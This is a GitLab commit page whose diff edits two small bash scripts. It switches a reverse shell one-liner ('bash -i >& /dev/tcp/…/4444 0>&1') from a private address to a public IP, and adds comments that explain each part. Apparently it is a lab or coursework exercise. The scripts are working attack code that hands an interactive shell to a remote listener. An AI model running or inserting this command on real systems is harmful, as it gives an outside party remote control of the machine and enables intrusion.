Skip to content
Snippets Groups Projects
Commit 43f7d82e authored by Martinz, David's avatar Martinz, David
Browse files

ad

parent 0fd66cdb
No related branches found
No related tags found
No related merge requests found
#!/bin/bash #!/bin/bash
echo "Reverse shell starting..." echo "Reverse shell starting..."
bash -i >& /dev/tcp/192.168.178.22/4444 0>&1 bash -i >& /dev/tcp/129.27.238.43/4444 0>&1
# bash -i: # bash -i:
......
#!/bin/bash #!/bin/bash
echo "Reverse shell starting..." echo "Reverse shell starting..."
bash -i >& /dev/tcp/192.168.178.22/4444 0>&1 bash -i >& /dev/tcp/129.27.238.43/4444 0>&1
# bash -i: # bash -i:
# Starts an interactive bash shell # Starts an interactive bash shell
# >& /dev/tcp/192.168.178.22/4444:
# /dev/tcp/192.168.178.22/4444 is a special Linux file that creates a TCP connection to the specified IP address (192.168.178.22) and port (4444). # /dev/tcp/192.168.178.22/4444 is a special Linux file that creates a TCP connection to the specified IP address (192.168.178.22) and port (4444).
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Please register or to comment